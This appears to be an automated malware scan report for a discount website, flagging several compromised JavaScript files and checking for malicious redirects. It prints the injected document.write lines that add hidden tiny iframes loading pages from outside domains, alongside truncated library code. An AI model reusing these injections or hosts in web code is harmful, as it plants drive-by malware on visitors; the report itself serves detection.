Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=discountcouncil.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://discountcouncil.com/ | 200 OK Content-Length: 172515 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 5x44 src: http://nmsbaseball.com/post.php?id=861229 <iframe name=twitter scrolling=auto frameborder=no align=center height=44 width=5 src=http://nmsbaseball.com/post.php?id=861229> | ||
http://discountcouncil.com/js/jquery-1.3.2.min.js | 200 OK Content-Length: 57413 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=1573174></iframe>');
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exe Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=1573174 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=1573174> | ||
http://discountcouncil.com/fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 15785 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://appleseedinc.com/aaod.html?j=1573174></iframe>');
;(function(b){var m,t,u,f,D,j,E,n,z,A,q=0,e={},o=[],p=0,d={},l=[],G=null,v=new Image,J=/\.(jpg|gif|png|bmp|jpeg)(.*)?$/i,W=/[^\.]\.(swf)\s*$/i,K,L=1,y=0,s="",r,i,h=false,B=b.extend(b("<div/>")[0],{prop:0}),M=b.browser.msie&&b.browser.version<7&&!window.XMLHttpRequest,N=function(){t.hide();v.on easingOut:"swing",showCloseButton:true,showNavArrows:true,enableEscapeButton:true,enableKeyboardNav:true,onStart:function(){},onCancel:function(){},onComplete:function(){},onCleanup:function(){},onClosed:function(){},onError:function(){}};b(document).ready(function(){b.fancybox.init()})})(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://appleseedinc.com/aaod.html?j=1573174 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://appleseedinc.com/aaod.html?j=1573174> | ||
http://discountcouncil.com/js/jscript_jquery-1.js | 404 Not Found Content-Length: 339 Content-Type: text/html | clean |
http://discountcouncil.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://discountcouncil.com/js/slidedeck.js | 200 OK Content-Length: 27994 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://appleseedinc.com/aaod.html?j=1573174></iframe>');
var SlideDeck; (function($){ SlideDeck = function(el,opts){ var self = this, el = $(el); var VERSION = "1.1.7"; this.options = { speed: 500, transition: 'swing', start: 1, }; initialize(opts); }; $.fn.slidedeck = function(opts){ var returnArr = []; for(var i=0; i<this.length; i++){ if(!this[i].slidedeck){ this[i].slidedeck = new SlideDeck(this[i],opts); } returnArr.push(this[i].slidedeck); } return returnArr.length > 1 ? returnArr : returnArr[0]; }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://appleseedinc.com/aaod.html?j=1573174 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://appleseedinc.com/aaod.html?j=1573174> | ||
http://discountcouncil.com/js/jquery.tinycarousel.min.js | 200 OK Content-Length: 3056 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=1573174></iframe>');
(function($){$.tiny=$.tiny||{};$.tiny.carousel={options:{start:1,display:1,axis:'x',controls:true,pager:false,interval:false,intervaltime:3000,rewind:false,animation:true,duration:1000,callback:null}};$.fn.tinycarousel=function(options){var options=$.extend({},$.tiny.carousel.options,options);this.each(function(){$(this Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=1573174 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=1573174> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: discountcouncil.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Dec 2014 11:34:31 GMT
Pragma: no-cache
Server: Apache
Content-Length: 172515
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=d58add3b25404eacec5e5c1810efc2d3; path=/
X-Powered-By: PHP/5.3.29
...172515 bytes of data.
GET / HTTP/1.1
Host: discountcouncil.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Dec 2014 11:34:31 GMT
Pragma: no-cache
Server: Apache
Content-Length: 172515
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=d58add3b25404eacec5e5c1810efc2d3; path=/
X-Powered-By: PHP/5.3.29
...172515 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: discountcouncil.com
Referer: http://www.google.com/search?q=discountcouncil.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: discountcouncil.com
Referer: http://www.google.com/search?q=discountcouncil.com
Result:
The result is similar to the first query. There are no suspicious redirects found.